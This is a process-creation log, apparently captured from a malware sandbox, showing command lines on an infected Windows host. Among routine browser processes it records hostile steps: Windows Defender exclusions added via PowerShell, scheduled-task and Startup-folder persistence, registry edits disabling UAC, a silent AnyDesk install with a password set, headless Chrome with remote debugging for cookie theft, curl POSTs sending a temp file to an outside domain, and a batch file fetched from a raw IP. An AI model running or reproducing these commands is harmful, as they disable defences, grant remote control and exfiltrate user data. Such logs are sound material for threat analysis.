"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6100 -ip 6100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1132
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2472,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7480 -ip 7480
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1072
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2384,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4824,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nfdKjErmBbK1.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0D7.tmp\E0D8.tmp\E0D9.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe""
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2504,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE7h5o8ADRYV.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe" && pause
C:\Users\Admin\Desktop\Files\pp.exe
"C:\Users\Admin\Desktop\Files\pp.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:2
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:3
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1876,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2592 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7444 -ip 7444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 1268
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\twztl.exe
"C:\Users\Admin\Desktop\Files\twztl.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\Files\pornhub_downloader.exe
"C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C2D.tmp\7C2E.tmp\7C2F.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe"
C:\Users\Admin\Desktop\Files\PORNHU~1.EXE
"C:\Users\Admin\Desktop\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8043.tmp\8044.tmp\8045.bat C:\Users\Admin\Desktop\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffcc21146f8,0x7ffcc2114708,0x7ffcc2114718
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Users\Admin\Desktop\Files\seksiak.exe
"C:\Users\Admin\Desktop\Files\seksiak.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
